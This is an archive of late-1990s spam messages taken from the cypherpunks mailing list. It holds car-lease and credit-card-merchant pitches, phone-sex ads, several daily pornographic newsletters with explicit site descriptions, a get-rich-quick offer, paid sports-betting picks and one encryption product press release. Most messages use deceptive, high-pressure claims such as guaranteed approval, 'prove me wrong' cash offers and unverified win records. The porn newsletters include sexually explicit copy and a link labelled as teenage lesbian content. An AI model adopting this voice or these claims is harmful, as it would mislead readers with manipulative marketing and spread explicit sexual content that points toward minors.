<FONT  COLOR="#000000" BACK="#ff0000" SIZE=3><I>($395 Yearly Membership Fee)</FONT><FONT  COLOR="#000000" BACK="#FFFFFF" SIZE=3></I>


<FONT  COLOR="#ff0000" SIZE=3>NO Capitalized cost reduction.   NO hassle with car salesmen.
NO bank "acquisition" fees.        NO balloon payments.
NO security deposit.                    NO hidden fees.
NO gimmicks.                              NO MLM crap.
95% Approval, regardless of past credit history.</FONT><FONT  COLOR="#000000" SIZE=3>


<FONT  COLOR="#000000" SIZE=5>If this sound like an Unbelievable Dream.....
<FONT  COLOR="#000000" SIZE=4>
<FONT  COLOR="#0000ff" SIZE=5><I>Wake Up And Smell The Coffee!!!</FONT><FONT  COLOR="#000000" SIZE=4></I>

Because that Unbelievable Dream Is Now Coming True!! :o)


<FONT  COLOR="#008000" SIZE=6>Call (714) 957-3417</FONT><FONT  COLOR="#000000" SIZE=4>
	

</B>Click Here To Be Removed......<B><I>

And I Guess You Will Continue To Keep On Dreaming :o(
<FONT  COLOR="#000000" SIZE=3>

<FONT  COLOR="#8000ff" SIZE=4>P.S. Good Things Comes To Those Who Wait!!!</FONT><FONT  COLOR="#000000" SIZE=3></I>

     <FONT  COLOR="#ff0000" SIZE=4><U>BUT NOT TO THOSE WHO WAIT TOO LONG!!!</FONT><FONT  COLOR="#000000" SIZE=3></U>
</B>
</P><P ALIGN=LEFT>












































































































































<FONT  COLOR="#000000" SIZE=3>
</PRE></HTML>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: n@n.com
Date: Thu, 22 Jan 1998 15:21:18 -0800 (PST)
To: n@n.com
Subject: Free Hot Talk
Message-ID: <199801222323.AAA07600@mx1.polbox.com>
MIME-Version: 1.0
Content-Type: text/plain


Want to talk with HOT, WET, SEXY, young girls right now?
They are waiting for your call right now, and they want to MAKE YOU CUM!

ARE YOU:
Horney?
Lonely?
Out of town?
Bored?
Just need someone to talk to???

WELL THEN CALL,

			AMBER'S HOT SEX TALK AT:
			      1-473-407-9374

You will be able to talk to girls 1 ON 1!  RIGHT NOW!

       **ABSOLUTELY FREE!**       **ABSOLUTELY FREE!**

All you pay is long distance fees!

NEVER RUN-AROUNDS!  NO TRANSFERS TO 1-900 NUMBERS, OR ANY OTHER NUMBERS TO CALL!


NO NEED FOR CREDIT CARDS!


TRY US OUT YOU'LL LOVE IT!

1-473-407-9374     1-473-407-9374     1-473-407-9374
1-473-407-9374     1-473-407-9374     1-473-407-9374
1-473-407-9374     1-473-407-9374     1-473-407-9374



*GAY?  WANT TO TALK TO HOT HUNG MEN RIGHT NOW?  CALL: 011-678-75628*




18+ Years old to call.





///////////////////////////////////////////////////////////////////////////////
If you wish to be removed from this advertiser's future mailings, please reply to:
remove@polbox.com with the subject "Remove" and this software will
automatically block you from their future mailings.
////////////////////////////////////////////////////////////////////////////////





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mail Delivery Subsystem <MAILER-DAEMON@chemistry.ohio-state.edu>
Date: Fri, 23 Jan 1998 00:24:44 -0800 (PST)
To: <cypherpunks@toad.com>
Subject: Returned mail: User unknown
Message-ID: <199801230824.DAA08829@chemistry.mps.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain

The original message was received at Fri, 23 Jan 1998 03:24:38 -0500 (EST)
from ts26-15.homenet.ohio-state.edu [140.254.114.54]

   ----- The following addresses had permanent fatal errors -----
<eureka-unsubscribe@eureka.abc-web.com>

   ----- Transcript of session follows -----
... while talking to eureka.abc-web.com.:
>>> RCPT To:<eureka-unsubscribe@eureka.abc-web.com>
<<< 553 sorry, your envelope sender is in my badmailfrom list (#5.7.1)
550 <eureka-unsubscribe@eureka.abc-web.com>... User unknown


Reporting-MTA: dns; chemistry.mps.ohio-state.edu
Received-From-MTA: DNS; ts26-15.homenet.ohio-state.edu
Arrival-Date: Fri, 23 Jan 1998 03:24:38 -0500 (EST)

Final-Recipient: RFC822; eureka-unsubscribe@eureka.abc-web.com
Action: failed
Status: 5.1.1
Remote-MTA: DNS; eureka.abc-web.com
Diagnostic-Code: SMTP; 553 sorry, your envelope sender is in my badmailfrom list (#5.7.1)
Last-Attempt-Date: Fri, 23 Jan 1998 03:24:40 -0500 (EST)


To: eureka-unsubscribe@eureka.abc-web.com
Subject: (no subject)
From: cypherpunks@toad.com
Date: Wed, 07 Jan 1998 00:04:05 -0800





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Fri, 23 Jan 1998 08:59:26 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Fri Jan 23 '98
Message-ID: <19980123082849.6473.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Friday's issue of Eureka!

HARD CITY
Ouch -  you bet  it's hard.  What is?  Stupid question!  One
visit to this website  and the search  for porn becomes more
of a daily jaunt.  It's simply  packed with  stuff to do and
see,  and what's more, it's FREE for a limited trial period!
Hard City ......................... http://www.hardcity.com/

PLEASE VISIT THIS FINE EUREKA! PARTNER SITE
THE ULTIMATE HARDCORE SITES
http://sexplosion.com/adverts.shtml
An incredible collection of over 30 sites featuring the
hottest free hardcore photos. The pix are easy to find and
the sites are all very accessible. You won't be
disappointed.

XXXTASY ISLAND
Cum on vacation to  XXXtasy island!  You'll get  a very warm
wet welcome from the island girls. They serve you Cock Tales
of erotic stories. They show you hot sex in their Slut Huts.
A nice looking site  with  good looking sex.  It's where the
waves  and  the  babes  come  lapping  around  your  thighs.
XXXtasy Island ................. http://www.xtasyisland.com/

AWESOME XXX
A nice spread  of free pix to choose from.  A cool site with
plenty to see.  Do  group sex,  mixed race sex,  one on one,
lesbian or bondage pics get you hot?  These are just some of
the free hardcore pix available,  and thumbnailed.  Awesome!
Awesome XXX ................ http://www.kjmedia.com/awesome/

BOOMBASTIC
Take a  peeping tom's  ride  thru over  1000 free pix.  Nice
quality photos show the high class girls in the way that God
intended them -  flat on their backs on the Net.  Technology
is a wonderful thing. Good looking girls. Good looking site.
Boombastic ................ http://205.246.63.10/boombastic/

SEX UTOPIA
Your head will spin and your  blood will pump at Sex Utopia.
There's free thumbnailed pix and you'll wish you were in'em!
The girls are getting serviced, good n'hard.  You can see it
all nice n'close. Sex Utopia takes you to the edge of heaven
Sex Utopia ........................... http//207.55.184.113/

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here --> http://www.netscape.com/download/
Teenage lesbian .. http://207.240.169.120/lesbian/start.html

CHAT WITH OTHER READERS
This chat is growing fast, and already there are a number of
regulars  you will meet most days.  It's good to see Eureka!
readers interacting with each other and having a great time!
Adult/Sex Chat -----------------> http://137.39.63.229/chat/
General/Fun Chat -------> http://137.39.63.229/chat/funchat/

THE BEST PHONE SEX
NEW!!!! LD Call only! - Live Hot Girls!!!!--->1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline-------->1-800-644-8779
FREE: Live 1-on-1 (international call only)--->011-678-77416

AMATEUR SITE OF THE DAY
ALLISON: Big-Boobs, Huge Tits. This  girl  is built like the
proverbial shit house. With curves like hers, Allison's tits
should be illegal.  But don't  let  her  boobs fool you, she
has plenty of other ASSets to go around. Allison is not only
a hot body, but she is  a  real sweetheart and her eyes will
mesmerize you!
---------------------------> http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
HotStories.com: Tired of all  those  pics?  Hot Stories lets
you use your imagination to is full potential. Over 100 free
sex stories in 8 different categories. Our stories are worth
a thousand pics! ................ http://www.hotstories.com/

DAILY CARTOON ----------> http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Every day  we bring you an exclusive  choice pic of a famous
adult porn star.  And we must tell you - these pix are abso-
luletly brilliant! ---> http://www.xxxadultstars.com/eureka/

GAYEUREKA!
The gay  newsletter is now  available.  You can get it here!
Gay Eureka! ----------> http://eureka.abc-web.com/gayeureka/

EUREKA! TRANSLATIONS
As well as English you can now choose any of these languages
DEUTSCH ------> http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ------> http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ----> http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ----> http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE > http://eureka.abc-web.com/eureka/portuguese.htm

TODAY'S FREE PIX
Pic  1 --------------------------> http://137.39.63.229/?230
Pic  2 --------------------------> http://137.39.63.229/?231
Pic  3 --------------------------> http://137.39.63.229/?232
Pic  4 --------------------------> http://137.39.63.229/?233
Pic  5 --------------------------> http://137.39.63.229/?234
Pic  6 --------------------------> http://137.39.63.229/?235
Pic  7 --------------------------> http://137.39.63.229/?236
Pic  8 --------------------------> http://137.39.63.229/?237
Pic  9 --------------------------> http://137.39.63.229/?238
Pic 10 --------------------------> http://137.39.63.229/?239

============================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER,  USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS EMAIL RIGHT BACK TO US.
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RPK New Zealand Ltd <info@rpkusa.com>
Date: Fri, 23 Jan 1998 15:28:50 -0800 (PST)
Subject: Announcement: RPK InvisiMail released on 12 Jan, 1998
Message-ID: <199801232310.PAA11330@proxy4.ba.best.com>
MIME-Version: 1.0
Content-Type: text/plain


You have received this message because at some time during the past two years you have requested to be put on the RPK New Zealand Ltd. company mailing list.  (We're the Fast Public Key Encryption company).  If you wish to be removed from the list, please forward this message to remove@rpkusa.com

--------------------------------

RPK New Zealand Ltd. in a joint venture with Virtually Online Ltd. has released RPK InvisiMail, a standards-based e-mail security application for use with Internet mail software (SMTP/POP3).  The product offers the strongest encryption available anywhere in the world.  Since it was built outside the United States, it is also available all over the world with strong encryption.  RPK InvisiMail is also the easiest product of its type to setup and use which makes it quite unique.

You can learn more about this product by reading the press release below or by visiting the web site at www.InvisiMail.com.  We are also offering FREE downloads of the RPK InvisiMail Intro product.  Please give it a try and pass it along to anyone you like.

--------------------------------

For Immediate Release

Contact:	Sal Cataldi, Cataldi PR +1 212.941.9464, scataldi@earthlink.net, www.InvisiMail.com

RPK InvisiMail(tm), secure Internet e-mail with globally available strong encryption for Microsoft, Netscape platforms
 
SAN FRANCISCO, Jan. 12, 1998 - InvisiMail Ltd (www.InvisiMail.com) announced today immediate worldwide availability of RPK(tm) InvisiMail(tm), a standards-based e-mail security add-in for Microsoft, Netscape and other POP3/SMTP Internet e-mail clients and gateway servers.  Tested and certified by the International Computer Security Association (www.ncsa.com), RPK InvisiMail automatically and transparently encrypts e-mail messages and attachments, authenticates the sender and verifies the contents of each message have not been changed in transit.

RPK InvisiMail is globally available with high strength encryption.  InvisiMail and the underlying RPK encryption algorithm were developed outside the United States.  Therefore, InvisiMail is not subject to restrictive U.S. export policies.  RPK InvisiMail is as easy to set up and use as anti-virus software, and just as important.  

While Microsoft and Netscape battle each other with incompatible and difficult to use security offerings, InvisiMail seamlessly integrates with ALL popular POP3/SMTP e-mail products including Netscape, Microsoft, Eudora, Pegasus, Calypso -- more than any other solution available today -- making it the preferred e-mail security product for multi-platform use, worldwide. 

All InvisiMail users can send the FREE InvisiMail Intro version to anyone worldwide, providing compatibility without requiring others to purchase anything, making InvisiMail unique among 
e-mail security offerings.

"Most people don't realize that their e-mail can be forged, altered or read by anyone, any time, without any evidence," said Jack Oswald, President and CEO of RPK Ltd.  "Without products like RPK InvisiMail, communications on the Internet are untrustworthy."

InvisiMail uses the RPK Fast Public Key Encryptonite(tm) Engine, the strongest cryptography available worldwide today.  RPK is dramatically faster than the well-known RSA algorithm, yet just as secure.  RPK has been analyzed by world class cryptographers who have issued reports on the security and integrity of the technology.

"InvisiMail is the easiest, fastest, most transparent e-mail security product I have seen," said Kevin Shannon, President of net*Gain, a specialist in launching Internet companies. "This is the product we've all been waiting for." 

As part of its official launch, InvisiMail Professional is available FREE to all New Zealand residents for ninety days.

RPK InvisiMail is available in two desktop versions: Intro (FREE) and Professional (introductory price $29.95).  RPK InvisiMail Enterprise Gateway Server will be available Q2 1998.  InvisiMail can be downloaded from: www.InvisiMail.com.

All trademarks and registered trademarks are those of their respective companies.

***





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 0000000@hotmail.com
Date: Fri, 23 Jan 1998 21:09:04 -0800 (PST)
To: Everyone@the.net
Subject: Free Internet Service
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Fellow Networker,

               WE WILL EITHER FIND A WAY OR MAKE ONE."   
                     - HANNIBAL

            " AS YOU SOW, SO SHALL YOU REAP"
                      - MARK 9-23

Stop the Pornography

A Brand-New Family Friendly ISP is now
 in Pre-Launch!  This ISP Blocks the pornographic Emails and sites.

Get your Free Self-Replicating Web Page now to hold your 
position close to the top!


<A HREF="mailto:freeinternet@usmc.net?subject=isp">
CLICK HERE TO GET MORE INFO. !!! </A> Please put isp as subject

<A HREF="mailto:freeinternet@usmc.net?subject=REMOVE">
CLICK TO BE REMOVED FROM OUR LIST </A> Please put remove as subject

Refer 5 friends and you monthly service is free

Looking forward to welcoming you aboard!

Sincerely,

 Frank
 IQI





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Sat, 24 Jan 1998 04:30:38 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Sat Jan 24 '98
Message-ID: <19980124083515.10769.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Saturday's issue of Eureka!

KARA'S ADULT PLAYGROUND
With 15 live sex shows, 1,300 Hardcore XXX videos, 1,000s of
Hardcore  and Softcore  Pix,  the  VaVoom  monthly magazine,
Kara's  exclusive monthly centrefolds,  adult games,  erotic
stories  and even casino  and sports  betting,  you won't be
going out for weeks particularly now that you can get a FREE
trial - your eyes will be popping out of your head!  Hahaha!
Kara's Playground ...... http://www.rjbtelcom.com/eplay.html

PLEASE VISIT THIS FINE EUREKA! PARTNER SITE
Premiere Porn Pics Vault
http://www.premierepics.com/index.htm
Featuring the best collection of SUPER HIGH QUALITY CUSTOM
photoshot images, FREE live sex show, LIVE AUDIO stripshow
with chat, and over 100's of streaming porn movies with
SOUND. FREE MEMBERSHIP!

ZAP'S POWER PORNO
Zap's got the power.  The power to make you drool. Get horny
with the very free, very hot, sex pix.  The girls generate a
a lot of heat.  The sparks fly and so do the juices,  during
the  explictly  pictured   horny  naked  sex.  Plug  me  in!
Zap's Power Porno .............. http://www.slutbox.com/zap/

3 WAY TRAFFIC
Nancy's got a site for sore eyes.  If you've ever fantasised
about getting naked with  two horny lovers then come see how
hot it can be.  Nancy's got hot chat for 3 way lovers. Hot 3
way stories from real chatters, and an orgy of hardcore pix.
A themed site presented using imagination,  style, and horn!
3 Way RTraffic .......... http://209.50.232.194/3waytraffic/

BIG BOOBS AND BLOW JOBS
Dive into this  double trouble jumbo jug site.  It's a great
site and a great sight  -  soft billowing mega jugs flapping
around  the guys' huge happy  hard ons.  What a great set of
pix.  A treasure chest of bj pix.  An avalanche of aureolae!
Big Boobs and Blow Jobs ....... http://www.waid.com.au/suck/

BETTY'S HOT PICS
Betty's hot. Every day she proves it.  Go see your welcoming
web mistress  strip for you daily!  Now that's  what we call
hospitality. She wants you to get off on her pix of lesbian,
straight, and gay.  Betty's storytime makes bedtimes better.
Betty's Hot Pics ........... http://bettyspics.sexshaft.com/

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here --> http://www.netscape.com/download/
Three dicks .................... http://207.168.184.26/trip/

CHAT WITH OTHER READERS
This chat is growing fast, and already there are a number of
regulars  you will meet most days.  It's good to see Eureka!
readers interacting with each other and having a great time!
Adult/Sex Chat -----------------> http://137.39.63.229/chat/
General/Fun Chat -------> http://137.39.63.229/chat/funchat/

THE BEST PHONE SEX
NEW!!!! LD Call only! - Live Hot Girls!!!!--->1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline-------->1-800-644-8779
FREE: Live 1-on-1 (international call only)--->011-678-77416

AMATEUR SITE OF THE DAY
JANES' JUNGLE: Auuugggghhhh stop by and see why Tarzan never
left the jungle! The  website's  theme  is fantastic as Jane
leads you through her Jungle  of  Love. With Jane's fabulous
breasts, you  will  be  beating  something  other  than your
chest, right Tarzan?
---------------------------> http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
Planet Mojo: Mojo  brings  you  the  juiciest erotic stories
weekly! Every  week  all  new  exciting  erotic  stories are
posted for your pleasure. Visit Mojo today! ................
................................. http://www.planetmojo.com/

DAILY CARTOON ----------> http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Every day  we bring you an exclusive  choice pic of a famous
adult porn star.  And we must tell you - these pix are abso-
luletly brilliant! ---> http://www.xxxadultstars.com/eureka/

GAYEUREKA!
The gay  newsletter is now  available.  You can get it here!
Gay Eureka! ----------> http://eureka.abc-web.com/gayeureka/

EUREKA! TRANSLATIONS
As well as English you can now choose any of these languages
DEUTSCH ------> http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ------> http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ----> http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ----> http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE > http://eureka.abc-web.com/eureka/portuguese.htm

TODAY'S FREE PIX
Pic  1 --------------------------> http://137.39.63.229/?240
Pic  2 --------------------------> http://137.39.63.229/?241
Pic  3 --------------------------> http://137.39.63.229/?242
Pic  4 --------------------------> http://137.39.63.229/?243
Pic  5 --------------------------> http://137.39.63.229/?244
Pic  6 --------------------------> http://137.39.63.229/?245
Pic  7 --------------------------> http://137.39.63.229/?246
Pic  8 --------------------------> http://137.39.63.229/?247
Pic  9 --------------------------> http://137.39.63.229/?248
Pic 10 --------------------------> http://137.39.63.229/?249

============================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER,  USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS EMAIL RIGHT BACK TO US.
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pkmrght193@aol.com
Date: Sat, 24 Jan 1998 11:46:44 -0800 (PST)
To: pkmrght193@aol.com
Subject: SUPER BOWL XXXII PICK
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><BODY BGCOLOR="#000000"><FONT COLOR="#00FFFF" SIZE=3>
    Hello SPORTS FANS!!!!  Wouldn't it feel really great to know exactly
who was going to win Sunday's SUPER BOWL match-up between the
Green Bay Packers and the Denver Broncos?  If you are an avid 
sports fan like myself, then I know you will enjoy this ad.  We are 
Prodigious Picks and Associates and we have created the best system
for picking sports games.  We decide our picks by using a consensus 
analysis system that takes the picks of SEVEN OF THE BEST 
HANDICAPPERS IN THE COUNTRY!!!!  If you are one of the hundreds
of callers that has given us a call in the past few weeks, we know that
we have already proven ourselves to YOU.  If you have not had a chance
to give us a call yet, we want to inform you that we went 33-16 by the line
in the past three weeks.  This includes going 7-2-1 in the NFL PLAYOFFS.
Don't lose your money trying to pick the game yourself or by even calling 
some other handicapper whose price per call is much more expensive
than ours.  Let us do the work and you get the MONEY!  So give us a call
this weekend and WE WILL DELIVER THE WINNING PICK FOR
SUPER BOWL XXXII!!!  
                                                  
                                                    1-900-773-9777
                                                   Only $10 per call   
                                                  Must be 18 or older
P.S.   After you take the bank on Super Bowl Sunday, give us a call
         after 4:00 P.M EST on Monday for TWO winning basketball
         picks.

                                         

 


</FONT><FONT  COLOR="#000000" SIZE=3>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gortega@ix.netcom.com
Date: Sat, 24 Jan 1998 14:10:50 -0800 (PST)
To: test@test93847.com
Subject: .
Message-ID: <17705699_91749677>
MIME-Version: 1.0
Content-Type: text/plain







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: majordomo@bulkemailserver.com
Date: Sat, 24 Jan 1998 16:55:11 -0800 (PST)
To: Friend@public.com
Subject: Do you take credit cards ?
Message-ID: <199801242343.SAA05330@ix.gen.com>
MIME-Version: 1.0
Content-Type: text/plain


       Can you say "yes I accept credit cards"?  If you can't  but want to, I can help! For as
little as $295 or lease a system for as low as $16 per month you can have 
all the advantages of accepting credit cards. 
NO long term commitments, NO statement fees, NO annual fees , NO hassles.
Increase sales, Increase impulse buys, Increase your credibility, INCREASE YOUR BOTTOM LINE
Lowest discount rate in the industry, Fast approval, 24 hour a day helpline
VISA-MASTERCARD-DISCOVER-AMERICAN EXPRESS put them to work for YOU!
                       Discount fees as low as 1.49%
                       Get started for as little as $20
All types of business accepted
                       Retail
                       Internet
                       Mail Order
                       In Home Services
For details , complete pricing , pictures and options call me
            at     1-215-470-8034   anytime

Tell me your name, type of business, expected credit card volume , phone and fax number your 
       
           Isn"t it time your business got an advantage?















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MAILER-DAEMON@toad.com
Date: Sun, 25 Jan 1998 03:56:16 -0800 (PST)
Subject: Happy New year, Don't Miss Out!
Message-ID: <199801250016.SAA06048@mail.t-1net.com>
MIME-Version: 1.0
Content-Type: text/plain


I will pay you $20,000.00 if you can prove me wrong!
Work one or both of my home business opportunities
and you will make money.

SIMPLE, PROVEN, EASY TO UNDERSTAND OPPORTUNITIES.
Looking for 150 serious people who want to make money.

Interested?
If YES: call: 330-722-1813

This is a serious offer. No MLM United States
Direct with National Manufacturer.

Absolutly FREE Information will be provided !
Absolutly NO OBLIGATION to receive FREE info!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Sun, 25 Jan 1998 01:30:00 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Sun Jan 25 '98
Message-ID: <19980125082106.5338.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Sunday's issue of Eureka!

PINKBITS
Voted the  #1 Teen (18+) site  on the web,  this is  one pay
site you  don't want  to miss out on!  Here's just one quote
from a satisfied member:  "This site delivers awesome value.
I have been a member of 3 other sites,  and this is the best
by far. It has the best pics, more live video, younger girls
and more  hardcore cumshots  than the  other sites  put tog-
ether".  And we have negotiated a special FREE trial member-
ship for Eureka subscribers, so don't take our word, go see!
PinkBits .. http://207.33.10.198/cgi-bin/gate1/pbm/pb_0024/0

PLEASE VISIT THIS FINE EUREKA! PARTNER SITE
Fuck it! You wanna Cum Inside!!! Nonstop Amazing Fuck Fest & Virtual Orgy
http://www.cuminside.com
Members Only Club offering the BEST PORN and SEX on the
INTERNET
with FREE LIVE VIDEOS, FREE STRIP SHOWS, hardcore
closeup pussy, cock and ass shots, MPEGS and many more bonus
features!

THE ROSE GARDEN
They're delicate as a flower but hard and nasty as they come
The girls at Rose Garden  get dirty in  the flower  beds for
you.  There's plenty of choice,  and plenty of daily updates
at this site.  With bikinis,  nudies or  hardcore pix of the
day.  Plus  a  shovelful of  free pix.  Blooming marvellous.
Rose Garden .. http://www.undergroundnet.com/rosegarden.html

STUDMONKEY'S OBSESSIONS
Go ape over Studmonkey's anal and lesbian hardcore galleries
Mr Pink and the  Studmonkey love  peachy,  girly, gloriously
tight  young butts.  To look at and to lick at.  If you love
the female form come see why  mankind is still on all fours.
Studmonkey ...................... http://www.studmonkey.com/

SUCKFLIX HARDCORE GALLERY
These pix don't suck. But some of the girls do!  Nicely laid
out,  Suckflix has got a  good variety of  nasty pix for the
lover of  facials,  fetish,  outdoor,  tits,  and just about
anything else.  Suckflix  gets  you  straight  to  the smut!
Suckflix .............. http://www.suckflix.com/freepix.html

TEXAS TANTRUM
Don't pout, don't blow your top.  Texas Tantrum soothes your
woes - with hardcore pix. Simple but effective. You get in a
tantrum here and you'll be spanked and tied up.  They've got
the pix to prove it.  There's no if's  just plenty of butts.
Surf there now young lady or you'll feel the back of my hand
Texas Tantrum ................. http://www.texastantrum.com/

BRAND NEW - HOORAY! THE ADULT SEARCH ENGINE
Now adult surfers have our very own search engine,  directly
designed to  only list adult sites,  and so run fast because
all other  types of site  are ignored.  Check it out  today!
Hooray! -----------------> http://eureka.abc-web.com/hooray/

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here --> http://www.netscape.com/download/
Pregnant ....................... http://207.168.184.26/preg/

CHAT WITH OTHER READERS
This chat is growing fast, and already there are a number of
regulars  you will meet most days.  It's good to see Eureka!
readers interacting with each other and having a great time!
Adult/Sex Chat -----------------> http://137.39.63.229/chat/
General/Fun Chat -------> http://137.39.63.229/chat/funchat/

THE BEST PHONE SEX
NEW!!!! LD Call only! - Live Hot Girls!!!!--->1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline-------->1-800-644-8779
FREE: Live 1-on-1 (international call only)--->011-678-77416

AMATEUR SITE OF THE DAY
VANESSA: A sexy young brunette  with  an incredible ass, you
will fall in lust the minute  you  lay your eyes on Vanessa.
Her site is easy to navigate and full of thumbnails and high
resolution pictures. Stop  by  and  say  hi  to  one  of the
internet's newest vixens!
---------------------------> http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
StoriesAndPics.com: StoriesAndPics.com gives you the best of
both worlds. Visit the site Yahoo calls "The Ultimate Erotic
Stories Site" Over  50  categories  of  sex  stories and XXX
pics! ....................... http://www.storiesandpics.com/

DAILY CARTOON ----------> http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Every day  we bring you an exclusive  choice pic of a famous
adult porn star.  And we must tell you - these pix are abso-
luletly brilliant! ---> http://www.xxxadultstars.com/eureka/

GAYEUREKA!
The gay  newsletter is now  available.  You can get it here!
Gay Eureka! ----------> http://eureka.abc-web.com/gayeureka/

EUREKA! TRANSLATIONS
As well as English you can now choose any of these languages
DEUTSCH ------> http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ------> http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ----> http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ----> http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE > http://eureka.abc-web.com/eureka/portuguese.htm

TODAY'S FREE PIX
Pic  1 --------------------------> http://137.39.63.229/?250
Pic  2 --------------------------> http://137.39.63.229/?251
Pic  3 --------------------------> http://137.39.63.229/?252
Pic  4 --------------------------> http://137.39.63.229/?253
Pic  5 --------------------------> http://137.39.63.229/?254
Pic  6 --------------------------> http://137.39.63.229/?255
Pic  7 --------------------------> http://137.39.63.229/?256
Pic  8 --------------------------> http://137.39.63.229/?257
Pic  9 --------------------------> http://137.39.63.229/?258
Pic 10 --------------------------> http://137.39.63.229/?259

============================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER,  USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS EMAIL RIGHT BACK TO US.
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sender1998@aol.com
Date: Sun, 25 Jan 1998 18:49:55 -0800 (PST)
To: User@aol.com
Subject: I just mailed you a check ...
Message-ID: <.>
MIME-Version: 1.0
Content-Type: text/plain


          I just mailed you a check ...

How many times have you heard that from a customer?

NOW YOU CAN TAKE CHECKS BY PHONE - FAX - or - INTERNET
and deposit the funds into your bank the same day! 

That's right, using CheckWriter, you can take a customer's 
check by phone-fax-email or internet form, and deposit
it into any U.S. bank the same day - Best of all it is 
TOTALLY FREE !!!  Once you own the software.

   NO MORE WAITING - GET THE ORDER EVERY SINGLE TIME !!!

CheckWriter will work on any Windows 95/NT PC. You can 
continue to draft unlimited checks completely fee FREE.

      Software packages $59.99 - $119.99 ...

To find out more about CheckWriter for Windows
call toll Free M-F 9 am to 6 pm Eastern Time...
free 1-800-893-6001 

         OR write for more information 

Click here to remove <---put your e mail address in subj. line !

Click here to ask for more info

PRINT THIS E-MAIL OUT NOW - KEEP THIS OR PASS IT ON...

There are over 70 million American consumers who 
don't have a credit card...but they do have a checking
account...don't miss these important customers,
call us today... 1-800-893-6001

**************************************************************************
This mailing was sent by RCS Promotions on behalf of Instantpc. RCS obtained your name by purchasing a list of addresses targeted towards business customers. RCS has no affiliation with InstantPC other than to provide a mailing service. If you feel you have received this message in error please click on the remove hyperlink or call RCS directly at 617-892-4191. Click here to remove <---put your e mail address  in subj. line !





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MAILER-DAEMON@toad.com
Date: Tue, 3 Feb 1998 16:46:22 -0800 (PST)
Subject: Liquidation
Message-ID: <199801260457.WAA04312@quick.notfalse.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarding this message to you because I thought the following 3 items would be
of real interest to you.

I wanted to get it out to you ASAP. This information is only going to be
available for a few more days. Deal is, right now, you can get still it for 
free.

Here is what you can get:

1) The contact names and private phone number of a company that is PAYING CASH
for unwanted used material handling equipment.

This company is one of the largest used equipment BUYERS in the nation and even
pays finders fees.

2) Wouldn't it be nice to save as much as 80% on items you're probably buying at
full retail currently? 


We've uncovered the Web address to one of the Internet's top  "Liquidation
Specials of the Month" web site .
Now you'll have the insider's track on buying at wholesale like the pros do.

It's really a cool site! 
But don't take my word for it, check it out for yourself.

3) Get the #1 hottest material handling product catalog on the market today.

